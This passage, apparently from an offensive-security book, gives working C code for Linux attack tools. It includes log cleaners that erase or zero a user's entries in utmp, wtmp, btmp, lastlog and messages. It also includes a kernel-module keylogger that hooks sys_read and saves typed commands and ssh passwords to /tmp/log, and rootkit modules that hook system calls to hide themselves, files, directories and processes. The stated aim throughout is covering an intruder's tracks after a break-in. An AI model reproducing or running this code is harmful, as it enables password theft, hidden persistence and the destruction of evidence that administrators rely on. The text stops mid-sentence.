#define BOOT_TIME      2   /* Time of system boot */
#define NEW_TIME       3   /* Time after system clock changed */
#define OLD_TIME       4   /* Time before system clock changed */
#define INIT_PROCESS   5   /* Process spawned by the init process */
#define LOGIN_PROCESS  6   /* Session leader of a logged in user */
#define USER_PROCESS   7   /* Normal process */
#define DEAD_PROCESS   8   /* Terminated process */
#define ACCOUNTING     9   /* System accounting */
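When examining records by hand, it helps to turn the numeric ut_type into its macro name. A small sketch, assuming the glibc definitions shown above; ut_type_name() is a hypothetical helper:

```c
#include <string.h>
#include <utmp.h>

/* Map a ut_type value to the name of its macro in <utmp.h>. */
const char *ut_type_name(short type)
{
    switch (type) {
    case EMPTY:         return "EMPTY";
    case RUN_LVL:       return "RUN_LVL";
    case BOOT_TIME:     return "BOOT_TIME";
    case NEW_TIME:      return "NEW_TIME";
    case OLD_TIME:      return "OLD_TIME";
    case INIT_PROCESS:  return "INIT_PROCESS";
    case LOGIN_PROCESS: return "LOGIN_PROCESS";
    case USER_PROCESS:  return "USER_PROCESS";
    case DEAD_PROCESS:  return "DEAD_PROCESS";
    case ACCOUNTING:    return "ACCOUNTING";
    default:            return "UNKNOWN";   /* not one of the listed types */
    }
}
```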


Some UNIX systems use an extended utmp structure named utmpx; accordingly, log files in these systems are named utmpx, wtmpx, and btmpx. Some log cleaners provide for cleaning these log files, but our utility will not do this, because I have not seen a single Linux system using these log files. However, you can implement this capability on your own, using the sample program for cleaning the utmp, wtmp, and btmp files as a guide.

New records are added to the wtmp file using the updwtmp() and logwtmp() functions. There are also special functions for working with the utmp file. For example, the setutent() function sets the pointer to the start of the utmp file, the getutent() function reads a record starting from the current pointer position in the file, the getutid() function performs a forward search starting from the current pointer position, and the pututline() function writes a utmp structure to the utmp file. You can find more detailed information about these functions, as well as example code, in their man pages. There are, however, no special functions for working with the lastlog file. For this reason, the demonstration log cleaner uses no special functions, only standard C functions: read(), write(), and the like. This is the approach taken in practically all log cleaners.
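The following sketch uses these utmp functions read-only, to count the active login sessions recorded in a utmp-format file, roughly what who reports. It assumes glibc, where utmpname() selects the file that setutent(), getutent(), and endutent() operate on; count_user_sessions() is a hypothetical name:

```c
#include <stdio.h>
#include <string.h>
#include <utmp.h>

/* Count USER_PROCESS records in a utmp-format file using the glibc
   utmp API. Returns -1 if utmpname() fails. */
int count_user_sessions(const char *path)
{
    struct utmp *ut;
    int count = 0;

    if (utmpname(path) == -1) {   /* select the file to read */
        perror("utmpname");
        return -1;
    }
    setutent();                   /* rewind to the first record */
    while ((ut = getutent()) != NULL) {
        if (ut->ut_type == USER_PROCESS)
            count++;
    }
    endutent();                   /* close the file */
    return count;
}
```

Passing /var/run/utmp counts current logins; running the same loop over /var/log/wtmp would instead count every USER_PROCESS record in the login history.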


19.2. Log Cleaner: Version One 


This section considers implementing a log cleaner that overwrites log information with zeros 
and spaces. The shortcoming of this method is that many intrusion-detection systems check 
the utmp, wtmp, and lastlog files for zero structures. Consequently, smart hackers use log 
cleaners based on the second method of operation (see Section 19.3). I only consider the first 
method because there are many log cleaners based on it. 
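The same observation can be turned around for detection. The following sketch, assuming glibc's struct utmp, counts records that consist entirely of zero bytes; the function name count_zeroed_records() is hypothetical, and real intrusion-detection systems may use other or additional heuristics:

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <utmp.h>

/* Return how many records in a utmp/wtmp/btmp file are entirely zero
   bytes, or -1 if the file cannot be opened. A trailing partial record
   or a read error ends the scan. */
long count_zeroed_records(const char *path)
{
    static const struct utmp zero;   /* static, so all bytes are zero */
    struct utmp rec;
    long zeroed = 0;
    int fd = open(path, O_RDONLY);

    if (fd == -1) {
        perror(path);
        return -1;
    }
    while (read(fd, &rec, sizeof rec) == (ssize_t)sizeof rec) {
        if (memcmp(&rec, &zero, sizeof rec) == 0)
            zeroed++;
    }
    close(fd);
    return zeroed;
}
```

A legitimately written record always has at least a nonzero type or time, so any all-zero record in wtmp is worth a closer look.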

The source code for the log cleaner, named logclean1.c, is not given in the book. You can find it in the \PART V\Chapter 19 directory on the accompanying CD-ROM. Here, I will only consider its key aspects.

I include the lastlog.h header file in the source code (#include <lastlog.h>). However, as I said earlier, it is not mandatory to use this header file in Linux systems, because it merely includes the utmp.h header file. I also define paths to the log files that the log cleaner will clean (although the UTMP_FILE and WTMP_FILE paths are already defined in the utmp.h file):

#define UTMP_FILE     "/var/run/utmp"
#define WTMP_FILE     "/var/log/wtmp"
#define BTMP_FILE     "/var/log/btmp"
#define LASTLOG_FILE  "/var/log/lastlog"
#define MESSAGES_FILE "/var/log/messages"




The program uses three main functions: the dead_uwbtmp() function cleans the utmp, wtmp, and btmp files; the dead_lastlog() function cleans the lastlog file; and the dead_messages() function cleans the messages text log file.

The source code for the dead_uwbtmp () function is shown in Listing 19.3. 





Listing 19.3. The dead_uwbtmp() function 





void dead_uwbtmp(char *name_file, char *username, char *tty)
{
    struct utmp pos;
    int fd;

    if ((fd = open(name_file, O_RDWR)) == -1) {
        perror(name_file);
        return;
    }

    while (read(fd, &pos, sizeof(struct utmp)) > 0)
    {
        if ((strncmp(pos.ut_name, username, sizeof(pos.ut_name)) == 0) &&
            (strncmp(pos.ut_line, tty, sizeof(pos.ut_line)) == 0)) {
            bzero(&pos, sizeof(struct utmp));
            if (lseek(fd, -sizeof(struct utmp), SEEK_CUR) != -1)
                write(fd, &pos, sizeof(struct utmp));
        }
    }

    close(fd);
}





The function is passed the name of the log file to clean along with the user name and TTY whose records need to be cleaned. The user name and TTY are taken from the command line. The log file is opened for reading and writing using the open() function, and then the file's structures are read sequentially using the read() function. As soon as a match with the user name (ut_name) and the TTY (ut_line) is found, the structure is filled with zeros using the bzero() function. The file pointer is moved back to the start of the matching record using the lseek() function, and the zeroed structure is written over it using the write() function.

The source code for the dead_lastlog() function is shown in Listing 19.4.





Listing 19.4. The dead_lastlog() function 





void dead_lastlog(char *name_file, char *username)
{
    struct passwd *pwd;
    struct lastlog pos;
    int fd;

    if ((pwd = getpwnam(username)) != NULL)
    {
        if ((fd = open(name_file, O_RDWR)) == -1) {
            perror(name_file);
            return;
        }

        lseek(fd, (long)pwd->pw_uid * sizeof(struct lastlog), SEEK_SET);
        bzero((char *)&pos, sizeof(struct lastlog));
        write(fd, (char *)&pos, sizeof(struct lastlog));
        close(fd);
    }
}








There is no user name field in the lastlog structure, so modifying this file requires an approach different from the one used for the utmp, wtmp, and btmp files. The problem is solved by taking advantage of the fact that records in the lastlog file are indexed by UID: the record for the user with UID n starts at offset n * sizeof(struct lastlog). The dead_lastlog() function finds the UID corresponding to the needed user name with the help of the standard getpwnam() function, and the record at that offset is then cleaned.
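The UID-indexed layout also makes it easy to look up a user's last login without modifying the file, which is essentially what the lastlog utility reports. A minimal read-only sketch, assuming glibc's struct lastlog from <utmp.h>; read_lastlog_entry() is a hypothetical name:

```c
#include <fcntl.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
#include <utmp.h>

/* Read the lastlog record for `uid` without modifying the file.
   Returns 0 if a full record was read, 1 if the file ends before that
   record, or -1 on error. */
int read_lastlog_entry(const char *path, uid_t uid, struct lastlog *out)
{
    /* Records are stored back to back and indexed by UID. */
    off_t offset = (off_t)uid * (off_t)sizeof(struct lastlog);
    int fd = open(path, O_RDONLY);
    ssize_t n;

    if (fd == -1) {
        perror(path);
        return -1;
    }
    n = pread(fd, out, sizeof *out, offset);   /* file offset is not moved */
    close(fd);
    if (n == (ssize_t)sizeof *out)
        return 0;
    return n < 0 ? -1 : 1;
}
```

A user who has never logged in either has no record (the function returns 1) or, because lastlog is usually a sparse file, a record that reads back as all zeros (ll_time == 0).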

The source code for the dead_messages() function is shown in Listing 19.5.





Listing 19.5. The dead_messages() function 





void dead_messages(char *name_file, char *username, char *tty, char *ip, char *hostname)
{
    clear_info(name_file, username);
    clear_info(name_file, tty);

    if (ip != NULL) clear_info(name_file, ip);
    if (hostname != NULL) clear_info(name_file, hostname);
}





The function is passed the name of the log file to clean along with the user name, TTY, IP address, and host name, by which the records that need to be cleaned will be located. These values are taken from the command line. The IP address and host name are optional; therefore, the dead_messages() function checks them for NULL. As you can see, most of the cleaning work is done by the clear_info() function (Listing 19.6).


Listing 19.6. The clear_info() function 








void clear_info(char *name_file, char *info)
{
    char buffer[MAXBUFF];
    FILE *lin;
    int i;
    char *pntr;
    char *token;
    char blank[200];

    for (i = 0; i < 200; i++) blank[i] = ' ';
    if ((lin = fopen(name_file, "r+")) == 0) {
        perror(name_file);
        exit(-1);
    }

    while (fgets(buffer, MAXBUFF, lin) != NULL)
    {
        if ((pntr = strstr(buffer, info)) != 0) {
            fseek(lin, ftell(lin) - strlen(pntr), SEEK_SET);
            token = strtok(pntr, " ");
            strncpy(token, blank, strlen(token));
            fputs(token, lin);
        }
    }

    fclose(lin);
}


The clear_info() function first fills a buffer with 200 space characters. Then the log file is opened for reading and writing, and each of its lines is read in a loop. If a line contains the information that needs to be cleaned, that word is overwritten with spaces from the buffer.

The remaining aspects of the cleaner’s operation ought to be clear from the program’s 
source code. 


19.3. Log Cleaner: Version Two 


In this section, I consider the implementation of a log cleaner based on the second method, that is, one that uses temporary files to remove the necessary entries from log files. The source code for the log cleaner, named logclean2.c, is not given in the book. You can find it in the \PART V\Chapter 19 directory on the accompanying CD-ROM. This program also uses three main functions: dead_uwbtmp() cleans the utmp, wtmp, and btmp files; dead_lastlog() cleans the lastlog file; and dead_messages() cleans the messages text log file. However, these functions work differently than their namesakes in the previous log cleaner.

In the dead_uwbtmp() and dead_messages() functions, the following approach is used: the log file is opened for reading, and a temporary file named ftmp is created. Then the entries are read sequentially in a loop from the log file and examined for the information that needs to be concealed. Entries that contain this information are discarded, and those that don't are written to the ftmp file. After the log file has been processed in this way, the copy_tmp() function is called (Listing 19.7). This function replaces the contents of the original log file with the information from the temporary ftmp file and then deletes the temporary file.


Listing 19.7. The copy_tmp() function 





void copy_tmp(char *name_file)
{
    char buffer[100];

    sprintf(buffer, "cat ftmp > %s ; rm -f ftmp", name_file);
    printf("%s\n", buffer);
    if (system(buffer) < 0) {
        printf("Error!");
        exit(-1);
    }
}








The dead_lastlog() function in this version is in many respects similar to its counterpart in the previous section, but instead of using the bzero() function it overwrites the fields of the necessary entry with zeros and spaces:

lseek(fd, (long)pwd->pw_uid * sizeof(struct lastlog), SEEK_SET);
pos.ll_time = 0;
strcpy(pos.ll_line, " ");
strcpy(pos.ll_host, " ");
write(fd, (char *)&pos, sizeof(struct lastlog));


The necessary entries in the lastlog file are not removed using a temporary file because records in this file are located by their position (the UID) rather than by their contents: dropping a record would shift the records of all users with larger UIDs.

The remaining aspects of the cleaner’s operation ought to be clear from the source code of 
the program. 





Chapter 20: Keyloggers 





Keyloggers surreptitiously intercept the user's keystrokes and save them to a file before passing them on to the operating system. Hackers use keyloggers primarily to intercept logins and passwords, which every user eventually enters for some service.

A good article devoted to writing keyloggers, “Writing Linux Kernel Keylogger,” was published in issue #59 of the electronic magazine Phrack. It considers different ways of intercepting keystrokes in Linux and shows how to implement an LKM keylogger for the version 2.4.x kernel. I will not restate any of the material from that article here, but I strongly recommend that you read it, because it is a good foundation for writing an LKM keylogger for the version 2.6.x kernel, which I do consider. My keylogger is based on the keylogger by a hacker going by the nickname mercenary, described in the article “Kernel Based Keylogger” (http://packetstormsecurity.org/UNIX/security/kernel.keylogger.txt). That keylogger is also for the 2.4.x kernel, so I simplified it somewhat and rewrote the code for the 2.6.x kernel.

Practically all local or remote key strokes in a Linux shell must be processed by the 
sys_read system call; therefore, intervening in the operation of this call makes it possible 
to intercept all keystrokes. The call can be intercepted and replaced using an LKM kernel 
module. 

The source code for the keylogger is lengthy, so I am not giving it all in the book. You can find the complete source code in the /PART V/Chapter 20 directory on the accompanying CD-ROM. Here I only consider its key aspects.
In the standard init_module() function, the read system call is replaced with a custom function named hacked_read(). In the cleanup_module() function, the original system call is restored:

int init_module(void)
{
    find_sys_call_table();
    original_read = (void *)sys_call_table[__NR_read];
    sys_call_table[__NR_read] = (unsigned long)hacked_read;

    return 0;
}

void cleanup_module(void)
{
    sys_call_table[__NR_read] = (unsigned long)original_read;
}


As you can see, at the beginning of the init_module() function there is a call to the find_sys_call_table() function, which finds the address of the sys_call_table system call table. This must be done for the 2.6.x kernel (the issue was considered in Chapter 18).

The hacked read() custom function first makes the original call, which is necessary to 
obtain the code of the pressed key; moreover, if this call is not made, the system will not work 
properly: 

int r;

r = original_read(fd, buf, count);


The number of read characters is saved in the r variable, and the code of the pressed key is 
stored in the buf buffer. 

Using the strace utility, you can establish that the read() function processes only one key code per call (in the following example, the ls -la command is entered):

# strace sh

read(0, "l", 1)                          = 1
write(2, "l", 1)                         = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, "s", 1)                          = 1
write(2, "s", 1)                         = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, " ", 1)                          = 1
write(2, " ", 1)                         = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, "-", 1)                          = 1
write(2, "-", 1)                         = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, "l", 1)                          = 1
write(2, "l", 1)                         = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, "a", 1)                          = 1
write(2, "a", 1)                         = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, "\r", 1)                         = 1
write(2, "\n", 1)                        = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0


Next, the hacked_read() function examines the contents of the buf buffer and accumulates all codes from it in the logger_buffer buffer:

static char logger_buffer[512];

strncat(logger_buffer, buf, 1);


In this process, the special key codes (<F1> to <F12>, <Home>, <End>, arrows, <Tab>, etc.) are replaced with their textual descriptions; for example, the <F6> code is replaced with the "[F6]" string:

if (buf[0] == 0x37)
    strcat(logger_buffer, "[F6]");


All special keys produce a multibyte code that starts with the byte 0x1b (ESC) followed by the byte 0x5b ('['). You can check this with the help of the same strace utility:

# strace -xx sh

rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, "\x1b", 1)                       = 1   // The <F1> key was pressed.
read(0, "\x5b", 1)                       = 1
read(0, "\x5b", 1)                       = 1
write(2, "\x07", 1)                      = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, "\x41", 1)                       = 1
write(2, "\x41", 1)                      = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, "\x1b", 1)                       = 1   // The <F2> key was pressed.
read(0, "\x5b", 1)                       = 1
read(0, "\x5b", 1)                       = 1
write(2, "\x07", 1)                      = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0
read(0, "\x42", 1)                       = 1
write(2, "\x42", 1)                      = 1
rt_sigprocmask(SIG_BLOCK, NULL, [], 8)   = 0


In his article, mercenary gives the codes for all special keys:

Three-byte key codes:

UpArrow:       0x1B 0x5B 0x41
DownArrow:     0x1B 0x5B 0x42
RightArrow:    0x1B 0x5B 0x43
LeftArrow:     0x1B 0x5B 0x44
Break (Pause): 0x1B 0x5B 0x50

Four-byte key codes:

F1:   0x1B 0x5B 0x5B 0x41
F2:   0x1B 0x5B 0x5B 0x42
F3:   0x1B 0x5B 0x5B 0x43
F4:   0x1B 0x5B 0x5B 0x44
F5:   0x1B 0x5B 0x5B 0x45
Ins:  0x1B 0x5B 0x32 0x7E
Home: 0x1B 0x5B 0x31 0x7E
PgUp: 0x1B 0x5B 0x35 0x7E
Del:  0x1B 0x5B 0x33 0x7E
End:  0x1B 0x5B 0x34 0x7E
PgDn: 0x1B 0x5B 0x36 0x7E

Five-byte key codes:

F6:  0x1B 0x5B 0x31 0x37 0x7E
F7:  0x1B 0x5B 0x31 0x38 0x7E
F8:  0x1B 0x5B 0x31 0x39 0x7E
F9:  0x1B 0x5B 0x32 0x30 0x7E
F10: 0x1B 0x5B 0x32 0x31 0x7E
F11: 0x1B 0x5B 0x32 0x33 0x7E
F12: 0x1B 0x5B 0x32 0x34 0x7E

The demonstration keylogger will process all of these special key codes.

As soon as a line feed or carriage return is encountered in the buf buffer (i.e., as soon as the <Enter> key is pressed), the contents of logger_buffer are written to the log file:

if (buf[0] == '\r' || buf[0] == '\n') {          // Enter?
    strncat(logger_buffer, "\n", 1);              // Adding a line feed to the buffer
    sprintf(test_buffer, "%s", logger_buffer);    // Copying to test_buffer
    write_to_logfile(test_buffer);                // Writing the contents of test_buffer
                                                  // to a log file
    logger_buffer[0] = '\0';                      // Clearing logger_buffer
}


The contents are saved in a log file using the write_to_logfile() function, whose source code is shown in Listing 20.1.





Listing 20.1. The function saving the pilfered key strokes to a log file 





int write_to_logfile(char *buffer)
{
    struct file *file = NULL;
    mm_segment_t fs;
    int error, old_uid;

    old_uid = current->uid;     // If the user is not root,
    current->uid = 0;           // make the user root to avoid
                                // problems opening or creating
                                // a temporary file.

    file = filp_open(LOGFILE, O_CREAT|O_APPEND, 00666);
    if (IS_ERR(file)) {
        error = PTR_ERR(file);
        goto out;
    }

    error = -EACCES;
    if (!S_ISREG(file->f_dentry->d_inode->i_mode))
        goto out_err;

    error = -EIO;
    if (!file->f_op->write)
        goto out_err;

    error = 0;
    fs = get_fs();
    set_fs(KERNEL_DS);
    file->f_op->write(file, buffer, strlen(buffer), &file->f_pos);
    set_fs(fs);
    filp_close(file, NULL);

out:
    current->uid = old_uid;     // Restoring the original user identifier
    return error;

out_err:
    filp_close(file, NULL);
    goto out;
}





The log file is opened using the filp_open() kernel function, which returns a pointer to a file structure. The keylogger uses the following log file name and location:

#define LOGFILE "/tmp/log"

The get_fs() and set_fs() functions temporarily switch the address limit to KERNEL_DS, so that the file's write() operation, which normally expects a buffer in user space, accepts a buffer located in the kernel.

The remaining aspects of the keylogger’s operation ought to be clear from the source code 
of the program. 

The keylogger is built and installed like a regular 2.6.x kernel module (see Chapter 18).
Don't forget to use the correct name of the keylogger in the makefile: 

obj-m += keylogger.o 


You can enhance your keylogger by, for example, saving a timestamp, the name and num- 
ber of the terminal, and the user identifier used by the user to login. 

Unfortunately, the keylogger has one big shortcoming: it cannot intercept passwords entered without echo in programs such as login and su. However, I noticed that when Midnight Commander is running in a separate terminal, the keylogger does intercept these passwords. I have not yet figured out the reasons for this. On the other hand, the keylogger has no problems intercepting passwords entered during authorization for ssh, telnet, and other services. The following is a sample excerpt from a file formed by the keylogger:

ls -la

netstat -na

[Up.Arrow] [Up.Arrow] [Left.Arrow] [Left.Arrow] [Down.Arrow]

SSH-2.0-OpenSSH_4.2

SSH-2.0-OpenSSH_4.2

sklyaroff   <-- an ssh password

exit

lsmod

To intercept all passwords, keystrokes must be processed at a level lower than that of the sys_read call, for example, at the keyboard driver level. You can consult the “Writing Linux Kernel Keylogger” article in issue #59 of Phrack for more information.


Chapter 21: Rootkits 





A rootkit is a program or a set of programs that an intruder uses to hide his or her presence on 
a computer system to allow surreptitious access to the computer system in the future. Install- 
ing a rootkit is the final step in the break-in process; unless the hacker installs a rootkit, the 
break-in will be detected by the administrator within a short time. The hacker would need 
continued surreptitious access to the compromised machine for such reasons as to install an 
IRC bot for anonymous communication using IRC or for use as a zombie to launch DDoS 
attacks. A hacker can also install a sniffer on the compromised machine and examine all network packets for passwords, which may give control over the network in which the victim machine is located. A rootkit, then, hides the tracks of the hacker's activity on the compromised machine: open ports, running processes, modified files, and the like.

Rootkits come in kernel and nonkernel varieties. Kernel rootkits consist of one or more LKMs that are loaded into the kernel and perform the operations necessary to cover the hacker's tracks in the system. Nonkernel rootkits are Trojan versions of executable system utilities, such as ls, ps, top, find, du, ifconfig, netstat, syslogd, and sshd. After system utilities and daemons are replaced with Trojan versions, they do not show the hacker's processes, files, established connections, and so on.

This chapter considers only kernel rootkits, because nonkernel rootkits are nearly obsolete 
nowadays: They are easily detected by file integrity controls. Moreover, it does not take a lot of 
hacker savvy to add a few lines to the source code of a standard utility and then recompile it to 
obtain its Trojan version. For example, the syslogd utility recompiled with the if 
(strstr(msg, "192.168.10.1")) return; line inserted in the right place in the source code 
will not log entries for the 192.168.10.1 IP address. 
One of the best-known nonkernel rootkits for Linux is Linux Root Kit (LRK). I included the LRK package on the CD-ROM so that you can learn about nonkernel rootkits. You can find it in the /Part V/Chapter 21 directory.

The following is a list of capabilities any full-fledged rootkit must have: 


- Hide Itself. The module does not appear in the list of loaded modules produced by the lsmod command. If the hacker does not hide the module, the administrator will eventually discover it and, for example, unload it with the rmmod command.

- File Hider. This capability prevents utilities installed in the system by the hacker (a sniffer, keylogger, backdoor, etc.) from being shown when files are listed.

- Directory Hider. Instead of spreading the planted files through different directories and hiding them there, the hacker can place them all in one directory, which is then hidden using this rootkit capability.

- Process Hider. Similar to hiding files and directories, this rootkit capability prevents information about the hacker's processes from being displayed by the ps command.

- Sniffer Hider. This feature suppresses the PROMISC flag shown by the ifconfig utility, thereby hiding sniffer operations.

- Hiding from netstat. This rootkit capability hides the information about open ports and established connections displayed by the netstat utility.

- Setuid Trojan. This capability grants root privileges to a user who calls setuid() with a magic UID number. It was discussed in Chapter 18, when a local LKM backdoor was considered, so it will not be considered in this chapter.


For clarity, each of the foregoing capabilities is implemented in a separate module.
Real-life rootkits, however, combine all of these capabilities in one module. After such
a module is loaded into the kernel, the hacker can invoke the needed feature from the command
line. To make passing commands to the rootkit more convenient, a rootkit usually provides
a control file, to which the commands from the command line are passed. This control file does
not have to be an actual file stored on the hard drive; it can simply be a memory image of a file,
that is, a pseudo file. The rootkit intercepts the execve() call and checks whether its filename
parameter is the name of the pseudo file. If it is, the code in the kernel module is executed.

When preparing this chapter, I studied the source code of such well-known rootkits as
adore-ng, knark, IntoXonia, and lkm Trojan, all of which can be downloaded from the
http://packetstormsecurity.org site. I borrowed many ideas and chunks of code from these
rootkits.

The biggest drawback of kernel rootkits is that they are neither backward nor upward 
compatible, so module code written for one kernel version may not work on a different kernel 
version. For example, module code written for the 2.6.0 kernel may not work on the 2.6.12 
kernel, let alone on the 2.4.2 kernel. So to be certain a rootkit works, first test it on the kernel
version or versions you intend to use it on.

The source codes for all programs in this chapter can be found in the /PART V/Chapter 21 
directory on the accompanying CD-ROM. 
21.1. Hide Itself


Rootkits for older kernel versions (2.0.x to 2.4.x) hide modules using the technique proposed by
a hacker going by the nickname of Solar Designer and described in the “Weakening the Linux
Kernel” article in issue #52 of the electronic magazine Phrack. This technique is based on
the module structure, which holds all information about a module. This structure is used by
the sys_init_module() system call, which in turn calls the module's init_module() function. All
it takes to remove a module from the list is to find the address of its module structure in memory
and zero out the name and refs fields in it. Solar Designer discovered that, when init_module() is
called, the address of the module structure is held in one of the registers, such as %ebx, %edi,
or %ebp. You only had to guess which register held it. However, a wrong guess could disable
module viewing in the system. So although this method reliably hides a module when the guess
is right, it is quite dangerous. The following is the source code for implementing this method:
int init_module()
{
    register struct module *mp asm("%ebx"); /* The register that actually
                                               holds the module structure
                                               address must be used in place
                                               of %ebx. */

    *(char *) (mp->name) = 0;
    mp->size = 0;
    mp->ref = 0;

    return 0;
}

This method, however, will not work in the 2.6.x kernel. In this case, you can use
another method, the one shown in Listing 21.1, which also works with many other
kernel versions. The functions called by the lsmod command can be determined using the
strace utility:


# strace lsmod
open("/proc/modules", O_RDONLY) = 6
read(6, "hide_module 2440 0 - Live 0xd0db"..., 1024) = 1024
write(1, "hide_module 2440 0 "..., 33) = 33


As you can see, lsmod reads the contents of the /proc/modules file with the read() function
and then displays each line on the screen with the write() function.

Therefore, the module simply intercepts the write() call (intercepting read() would work as
well) and checks whether the calling process is lsmod. If it is, the module's name is sought in the
buffer being written. If the name is found, the call returns immediately, reporting that all bytes
were written, so the information about the module does not appear in the output of the lsmod command.

This method, however, does not hide the module from anyone who simply views the contents
of the /proc/modules file, which lists all loaded modules. You could try to solve this problem
by performing analogous checks when the file is viewed and deleting the information about
the module from the output. The problem here, however, is that the file can be viewed by
different means, for example, with the cat /proc/modules or dd if=/proc/modules bs=1
commands or in Midnight Commander.





Listing 21.1. A kernel module that hides itself from the lsmod utility (hide_module.c)





#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <linux/sched.h>     /* current */
#include <linux/slab.h>      /* kmalloc(), kfree() */
#include <linux/string.h>    /* strcmp(), strstr() */
#include <asm/uaccess.h>     /* copy_from_user() */

MODULE_LICENSE("GPL");

/* Name of the module to hide */
#define MODULE_NAME "hide_module"

int (*orig_write)(int, const char*, size_t);
unsigned long* sys_call_table;

void find_sys_call_table(void)
{
    /* See Section 18.2.2 or the source code on the CD-ROM
       for the contents of the find_sys_call_table() function. */
}

int new_write(int fd, const char* buf, size_t count)
{
    char *temp;
    int ret;

    /* If the lsmod command is executed, */
    if (!strcmp(current->comm, "lsmod")) {
        /* allocating memory in the kernel space and
           copying the contents of the buf buffer to it */
        temp = (char *)kmalloc(count + 1, GFP_KERNEL);
        copy_from_user(temp, buf, count);
        temp[count] = 0; /* Just in case, add the terminating zero. */
        /* If the module's name is encountered, */
        if (strstr(temp, MODULE_NAME) != NULL) {
            kfree(temp);   /* freeing the buffer in the heap */
            return count;  /* Returning the result */
        }
        kfree(temp);
    }

    /* Executing the original function call */
    ret = orig_write(fd, buf, count);
    return ret;
}

int init_module(void)
{
    find_sys_call_table();
    orig_write = (void*)sys_call_table[__NR_write];
    sys_call_table[__NR_write] = (unsigned long)new_write;
    return 0;
}

void cleanup_module(void)
{
    sys_call_table[__NR_write] = (unsigned long)orig_write;
}





21.2. Hiding the Files 


The entries in a directory are read by the getdents64 or getdents system call. The exact call
used depends on the kernel version and can be learned with the strace utility, as was done
in the previous section. This call is made by the readdir() function, which is used to read
directories. The result produced by getdents64 is stored as a list of struct dirent64 structures;
the call returns the number of bytes read. Of interest are the d_reclen and d_name fields of
this structure, which hold the entry length and the file name, respectively. Thus, all you have
to do to hide a file entry is to intercept the getdents64 call, find the corresponding entry in
the produced list of structures, and delete it. The implementation of the module is shown in
Listing 21.2.

After the module is compiled and loaded into the kernel, the specified file will not be
shown in the output of the ls command or in a file manager such as Midnight Commander.
However, if you know the name of the hidden file, you can execute it or perform any other
operation (e.g., copying) on it.





Listing 21.2. A kernel module to hide a file (hide_file.c) 





#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/dirent.h>
#include <linux/syscalls.h>
#include <linux/slab.h>      /* kmalloc(), kfree() */
#include <linux/string.h>    /* strcmp(), memmove() */
#include <asm/uaccess.h>     /* copy_from_user(), copy_to_user() */

MODULE_LICENSE("GPL");

int (*orig_getdents)(u_int fd, struct dirent *dirp, u_int count);
unsigned long* sys_call_table;
static char *hide = "file"; /* Name of the file to hide */

void find_sys_call_table(void)
{
    /* See Section 18.2.2 or the source code on the CD-ROM
       for the contents of the find_sys_call_table() function. */
}

int new_getdents(u_int fd, struct dirent *dirp, u_int count)
{
    int tmp, t;
    unsigned int n;

    struct dirent64 {
        int d_ino1, d_ino2;
        int d_off1, d_off2;
        unsigned short d_reclen;
        unsigned char d_type;
        char d_name[0];
    } *dirp2, *dirp3;

    /* Determining the length of the entries in the directory
       (a negative value is an error code and is passed through) */
    tmp = (*orig_getdents)(fd, dirp, count);

    if (tmp > 0) {
        /* Allocating memory in the kernel space and
           copying the contents of the directory to it */
        dirp2 = (struct dirent64 *)kmalloc(tmp, GFP_KERNEL);
        copy_from_user(dirp2, dirp, tmp);

        /* Using the second structure and saving the value
           of the length of the directory entries */
        dirp3 = dirp2;
        t = tmp;

        /* Searching for the target file */
        while (t > 0) {
            /* Reading the length of the current entry and determining
               the length of the remaining entries in the directory */
            n = dirp3->d_reclen;
            t -= n;

            /* Checking whether the file name in the current entry matches
               the target file name */
            if (strcmp((char *)&(dirp3->d_name), hide) == 0) {
                /* If it does, remove the entry by moving the remaining
                   entries over it and calculate the new length of the
                   directory's entries; the next entry is now at dirp3 */
                memmove(dirp3, (char *)dirp3 + n, t);
                tmp -= n;
            } else {
                /* Moving the pointer to the next entry */
                dirp3 = (struct dirent64 *)((char *)dirp3 + n);
            }
        }
        /* Returning the result and releasing the memory */
        copy_to_user(dirp, dirp2, tmp);
        kfree(dirp2);
    }

    /* Returning the length of the directory's entries */
    return tmp;
}

int init_module(void)
{
    find_sys_call_table();
    orig_getdents = (void *)sys_call_table[__NR_getdents64];
    sys_call_table[__NR_getdents64] = (unsigned long)new_getdents;
    return 0;
}

void cleanup_module(void)
{
    sys_call_table[__NR_getdents64] = (unsigned long)orig_getdents;
}





21.3. Hiding the Directories and Processes 


Directories and processes can be hidden using the same method. I learned about this method
from the “Sub proc_root Quando Sumus (Advances in Kernel Hacking)” article in issue #58 of
Phrack. The method does not require intercepting system calls. This is possible because in
Linux, devices and directories are treated as files. Each open “file” is represented in the kernel
by a file structure. The f_op field of the file structure points to a file_operations
structure, which stores pointers to the standard file operation functions, such as read(),
write(), readdir(), and ioctl(). The file and file_operations structures are defined in the
<linux/fs.h> header file. The behavior of a specific file (directory, device) can be modified by
substituting the corresponding function pointer in the file_operations structure or replacing it
with NULL (the latter meaning that the given function is not implemented). Because you need
to hide directories, the most convenient way of doing this is to substitute the pointer to the
readdir() function, which is defined in the file_operations structure as follows:
int (*readdir) (struct file *, void *, filldir_t);


The readdir() function implements the readdir(2) and getdents(2) system calls for
directories and is ignored for regular files.

The pointer could simply be replaced with NULL, but then no directories would be shown at all.
Because a rootkit only needs to hide certain directories, the original pointer is instead replaced
with a pointer to a custom function, which filters out the specified directory.

As you will recall, the /proc file system has one directory for each running process, named
after the process's PID. These directories are created and removed as processes are started
and terminated. Each process directory contains files storing different information about the
process. Thus, if the directory of a process is hidden in the /proc file system, the process will
not be shown by ps, top, and other similar commands. This is why this method for hiding
directories can also be used to hide processes. Naturally, it can be used to hide not only
